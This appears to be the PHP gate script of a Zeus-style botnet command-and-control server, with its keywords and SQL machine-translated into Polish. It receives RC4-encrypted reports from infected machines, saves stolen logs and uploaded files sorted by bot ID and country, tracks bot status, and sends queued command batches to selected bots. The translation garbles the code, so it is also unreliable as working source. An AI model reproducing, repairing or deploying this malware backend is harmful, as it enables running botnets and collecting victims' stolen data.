(1):
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
12:
13:
14:
15:
16:
17:
18:
19:
20:
21:
22:
23:
24:
25:
26:
27:
28:
29:
30:
31:
32:
33:
34:
35:
36:
37:
38:
39:
40:
41:
42:
43:
44:
45:
46:
47:
48:
49:
50:
51:
52:
53:
54:
55:
56:
57:
58:
59:
60:
61:
62:
63:
64:
65:
66:
67:
68:
69:
70:
71:
72:
73:
74:
75:
76:
77:
78:
79:
80:
81:
82:
83:
84:
85:
86:
87:
88:
89:
90:
91:
92:
93:
94:
95:
96:
97:
98:
99:
100:
101:
102:
103:
104:
105:
106:
107:
108:
109:
110:
111:
112:
113:
114:
115:
116:
117:
118:
119:
120:
121:
122:
123:
124:
125:
126:
127:
128:
129:
130:
131:
132:
133:
134:
135:
136:
137:
138:
139:
140:
141:
142:
143:
144:
145:
146:
147:
148:
149:
150:
151:
152:
153:
154:
155:
156:
157:
158:
159:
160:
161:
162:
163:
164:
165:
166:
167:
168:
169:
170:
171:
172:
173:
174:
175:
176:
177:
178:
179:
180:
181:
182:
183:
184:
185:
186:
187:
188:
189:
190:
191:
192:
193:
194:
195:
196:
197:
198:
199:
200:
201:
202:
203:
204:
205:
206:
207:
208:
209:
210:
211:
212:
213:
214:
215:
216:
217:
218:
219:
220:
221:
222:
223:
224:
225:
226:
227:
228:
229:
230:
231:
|
php
/*********************/
/**/
/* Wersja: 5.1.0 *
/* Autor: RM *
/* Komentarz: 071223 *
/**/
/*********************/
funkcja sendemptyreply ()
{
$reply_data = paczka ("LLL", HEADER_SIZE + ITEM_HEADER_SIZE, (0), 1). "J ¿ \ x136 ¿ K ¿ ¿ y ¿ u.#H \ x18 ¿ \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00";
echowy rc4 ($reply_data, BIN_CRYPTKEY);
wyjście ();
}
funkcja getcountryipv4 ()
{
globalny $real_ipv4;
$ip = sprintf ("%u", ip2long ($real_ipv4));
jeżeli (($r = @mysql_query ("WYBRANY c OD ipv4toc DOKĄD l<='".$ip. ""I h>="". $ip. "'OGRANICZENIE (1)")) && ($m = mysql_fetch_row ($r))! == fałszywy)
{
powrotny $m [(0)];
}
powrót "--";
}
funkcja touint ($str)
{
$q = @unpack ("L", $str);
jeżeli (is_array ($q) && is_numeric ($q [(1)]))
{
powrotny $q [(1)];
}
powrót (0);
}
funkcja toint ($str)
{
$q = @unpack ("l", $str);
jeżeli (is_array ($q) && is_numeric ($q [(1)]))
{
powrotny $q [(1)];
}
powrót (0);
}
funkcja toushort ($str)
{
$q = @unpack ("S", $str);
jeżeli (is_array ($q) && is_numeric ($q [(1)]))
{
powrotny $q [(1)];
}
powrót (0);
}
definiować ("__REPORT", "(1)");
jeżeli ($_SERVER ["REQUEST_METHOD"]! == "POCZTA")
{
wyjście ();
}
require_once ("system/global.php");
require_once ("system/config.php");
$data = @file_get_contents ("php: //input");
$data_size = @strlen ($data);
jeżeli ($data_size < HEADER_SIZE + ITEM_HEADER_SIZE)
{
wyjście ();
}
$data = rc4 ($data, BIN_CRYPTKEY);
jeżeli (strcmp (md5 (substr ($data, HEADER_SIZE), true), substr ($data, HEADER_MD5, 16))! == (0))
{
wyjście ();
}
$list = szyk ();
$i = HEADER_SIZE;
podczas gdy ($i < $data_size)
{
$k = @unpack ("L4", @substr ($data, $i, ITEM_HEADER_SIZE));
$list [$k [(1)]] = @substr ($data, $i + ITEM_HEADER_SIZE, $k [3]);
$i += ITEM_HEADER_SIZE + $k [3];
}
$data ($data);
jeżeli (opróżniać ($list [SBCID_BIN_VERSION]) || opróżniać ($list [SBCID_BIN_ID]))
{
wyjście ();
}
jeżeli (! connecttodb ())
{
wyjście ();
}
$bin_id = podstrzyżenie ($list [SBCID_BIN_ID]);
$bin_id_q = addslashes ($bin_id);
$binnet = opróżniać ($list [SBCID_BINNET])? DEFAULT_BINNET: podstrzyżenie ($list [SBCID_BINNET]);
$binnet_q = addslashes ($binnet);
$bin_version = touint ($list [SBCID_BIN_VERSION]);
$real_ipv4 = podstrzyżenie (! opróżniać ($_GET ["ip"])? $_GET ["ip"]: $_SERVER ["REMOTE_ADDR"]);
$country = getcountryipv4 ();
$country_q = addslashes ($country);
$curtime = czas ();
$rtime_min_online = $curtime - BIN_TIMEOUT * 60;
jeżeli (! opróżniać ($list [SBCID_BATCH_STATUS]))
{
{
mysql_query ("AKTUALIZACJA bincmdbatches USTAWIAĆ complete=complete+1, complete_BINs=CONCAT (complete_BINs, "\ \ (0)". $bin_id_q. " \ \ (0)") DOKĄD batch_id='".toint ($list [SBCID_BATCH_STATUS]). " 'OGRANICZENIE (1) ");
file_put_contents ("2", mysql_error ());
sendemptyreply ();
}
inny
{
jeżeli (! opróżniać ($list [SBCID_BINLOG]) || ! opróżniać ($list [SBCID_BINLOG_TYPE]))
{
$type = touint ($list [SBCID_BINLOG_TYPE]);
jeżeli ($type == BLT_FILE)
{
$bad_exts = szyk ("php", "asp", "exe", "pl", "cgi", "cmd", "nietoperz");
$fd_hash = md5 ($list [SBCID_BINLOG]);
$file_path = str_replace ("\ \", "/", "/". $BINnet. "/". $BIN_id. "/". (opróżniać ($list [SBCID_PATH_DEST])? "nieznane": $list [SBCID_PATH_DEST]));
jeżeli (strpos ($file_path, "/. .") === fałszywy)
{
$file_path = REPORTS_PATH. "/files/". $file_path;
$inf = pathinfo ($file_path);
jeżeli (opróżniać ($inf ["rozszerzenie"]))
{
$inf ["rozszerzenie"] = "dat";
}
$file_path = $inf ["dirname"]. "/".basename ($inf ["basename"],". ". $inf ["rozszerzenie"]). "*.". $inf ["rozszerzenie"];
jeżeli (array_search (strtolower ($inf ["rozszerzenie"]), $bad_exts)! == fałszywy)
{
$file_path. = ".dat";
}
$i = (0);
dla (; $i < 9999; ++$i)
{
$f = str_replace ("*", $i == (0)? "": " [". $i."] ", $file_path);
jeżeli (file_exists ($f))
{
jeżeli (($fd_size = filesize ($f)) && strcmp (md5_file ($f), $fd_hash) === (0))
{
przerwa;
jeżeli (md5_file ($f))
{
przerwa;
}
}
inny
{
jeżeli (createdir ($inf ["dirname"]))
{
}
jeżeli (! ($h = fopen ($f, "wb")))
{
wyjście ();
}
kierdel ($h, LOCK_EX);
fwrite ($h, $list [SBCID_BINLOG]);
kierdel ($h, LOCK_UN);
fclose ($h);
}
przerwa;
}
}
}
inny jeżeli (REPORTS_TO_DB == 1)
{
$table = "reports_" .gmdate ("ymd", $curtime);
$QUERY = "WSZYWKA OPÓŹNIAĆ W". $table. "SET BIN_id='".$bin_id_q. "", BINnet="". $BINnet_q. "", BIN_version="". $BIN_version. "", path_source="". (opróżniać ($list [SBCID_PATH_SOURCE])? "": addslashes ($list [SBCID_PATH_SOURCE])). "", path_dest="". (opróżniać ($list [SBCID_PATH_DEST])? "": addslashes ($list [SBCID_PATH_DEST])). "", time_system="". (opróżniać ($list [SBCID_TIME_SYSTEM])? (0): toint ($list [SBCID_TIME_SYSTEM])). "", time_tick="". (opróżniać ($list [SBCID_TIME_TICK])? (0): toint ($list [SBCID_TIME_TICK])). "", time_localbias="". (opróżniać ($list [SBCID_TIME_LOCALBIAS])? (0): toint ($list [SBCID_TIME_LOCALBIAS])). "", os_version="". (opróżniać ($list [SBCID_OS_INFO])? "": addslashes ($list [SBCID_OS_INFO])). "", language_id="". (opróżniać ($list [SBCID_LANGUAGE_ID])? (0): toushort ($list [SBCID_LANGUAGE_ID])). "", process_name="". (opróżniać ($list [SBCID_PROCESS_NAME])? "": addslashes ($list [SBCID_PROCESS_NAME])). "", type="". $type. "", ipv4="" .addslashes ($real_ipv4). "", country="". $country_q. "", rtime="". $curtime. "", context="" .addslashes ($list [SBCID_BINLOG]). "'";
jeżeli (@! mysql_query ($query) || @ (! mysql_query ("TWORZYĆ STÓŁ JEŚLI NIE ISTNIEĆ". $table. "JAK raport") &&! @mysql_query ($query)))
{
wyjście ();
}
}
inny jeżeli (REPORTS_TO_FS == 1)
{
$file_path = str_replace ("\ \", "/", "/". $BINnet. "/". $real_ipv4);
jeżeli (! (strpos ($file_path, "/. .") === fałszywy))
{
przerwa;
}
$file_path = REPORTS_PATH. "/logs/". $file_path;
jeżeli (createdir ($file_path))
{
}
jeżeli (! ($h = fopen ($file_path. "/". $BIN_id, "wb")))
{
wyjście ();
}
kierdel ($h, LOCK_EX);
fwrite ($h, "bin_id=". $bin_id. " \ r \ nbinnet= ". $binnet. "\ r \ ntime_system=". (opróżniać ($list [SBCID_TIME_SYSTEM])? (0): ftime ("H: i: s d.m.Y", toint ($list [SBCID_TIME_SYSTEM]))). " \ r \ ntime_tick= ". (opróżniać ($list [SBCID_TIME_TICK])? (0): toint ($list [SBCID_TIME_TICK])). "\ r \ ntime_localbias=". (opróżniać ($list [SBCID_TIME_LOCALBIAS])? (0): toint ($list [SBCID_TIME_LOCALBIAS])). " \ r \ nlanguage_id= ". (opróżniać ($list [SBCID_LANGUAGE_ID])? (0): toushort ($list [SBCID_LANGUAGE_ID])). "\ r \ nprocess_name=". (opróżniać ($list [SBCID_PROCESS_NAME])? "": $list [SBCID_PROCESS_NAME]). " \ r \ ntype= ". $type. "\ r \ nipv4=". $real_ipv4. " \ r \ ncountry= ". $country. "\ r \ nrtime=" .ftime ("H: i: s d.m.Y", $curtime). " \ r \ ncontext= ". $list [SBCID_BINLOG]. "\ r \ n \ r \ n \ r \ n");
kierdel ($h, LOCK_UN);
fclose ($h);
}
}
inny jeżeli (! opróżniać ($list [SBCID_BIN_STATUS]))
{
$query = "BIN_id='".$bin_id_q. "", BINnet="". $BINnet_q. "", BIN_version="". $BIN_version. "", net_latency="". (opróżniać ($list [SBCID_NET_LATENCY])? (0): touint ($list [SBCID_NET_LATENCY])). "", port_s1="". (opróżniać ($list [SBCID_PORT_S1])? (0): toushort ($list [SBCID_PORT_S1])). "", time_localbias="". (opróżniać ($list [SBCID_TIME_LOCALBIAS])? (0): toint ($list [SBCID_TIME_LOCALBIAS])). "", os_version="". (opróżniać ($list [SBCID_OS_INFO])? "": addslashes ($list [SBCID_OS_INFO])). "", language_id="". (opróżniać ($list [SBCID_LANGUAGE_ID])? (0): toushort ($list [SBCID_LANGUAGE_ID])). "", ipv4="" .addslashes ($real_ipv4). "", country="". $country_q. "", rtime_last="". $curtime. "'";
jeżeli (mysql_query ("WSZYWKA W BINlist USTALONY rtime_first='".$curtime. "", rtime_online=" {$curtime} ", flag_install="". (touint ($list [SBCID_BIN_STATUS]) == BS_INSTALLED? (1): (0)). "",". $query. ("NA DUPLIKAT KLUCZ AKTUALIZACJA rtime_online=IF (rtime_last <=" ". $rtime_min_online. " "," {$curtime} ', rtime_online), {$query} ")))
{
przerwa;
}
wyjście ();
}
inny
{
wyjście ();
}
} podczas gdy ((0));
}
$reply_data = "";
$reply_count = (0);
$BIN_id_q = tosqlsafemask ($BIN_id_q);
$BINnet_q = tosqlsafemask ($BINnet_q);
$country_q = tosqlsafemask ($country_q);
$r = @mysql_query ("WYBRANY id, batch_id, batch_text OD BINcmdbatches DOKĄD flag_disabled=0 I (send_limit=0 LUB sended < send_limit) I" .(" (complete_BINs NIE LUBIĆ "% \ \ (0)". $BIN_id_q. " \ \ 0%") I ").(" (countries_wl= '' LUB countries_wl LUBIĆ BINARNY "% \ \ (0) ". $country_q. "\ \ 0%") I ").(" (countries_bl NIE LUBIĆ BINARNY "% \ \ (0)". $country_q. " \ \ 0%") I ").(" (binnets_wl= '' LUB binnets_wl LUBIĆ BINARNY "% \ \ (0) ". $BINnet_q. "\ \ 0%") I ").(" (binnets_bl NIE LUBIĆ BINARNY "% \ \ (0)". $BINnet_q. " \ \ 0%") I ").(" (BINs_wl= '' LUB BINs_wl LUBIĆ BINARNY "% \ \ (0) ". $BIN_id_q. "\ \ 0%") "). "OGRANICZENIE 10");
podczas gdy ($r && ($m = mysql_fetch_row ($r)))
{
$size = strlen ($m [2]);
$reply_data. = pakować ("LLLL", $m [(1)], (0), $size, $size). $m [2];
++$reply_count;
@mysql_query ("AKTUALIZACJA bincmdbatches USTAWIAĆ sended=sended+1 DOKĄD id='".$m [(0)]. "'OGRANICZENIE (1)");
}
jeżeli ((0) < $reply_count)
{
$reply_data = paczka ("LLL", HEADER_SIZE + strlen ($reply_data), (0), $reply_count) .md5 ($reply_data, prawdziwy). $reply_data;
echowy rc4 ($reply_data, BIN_CRYPTKEY);
wyjście ();
}
sendemptyreply ();
? >
|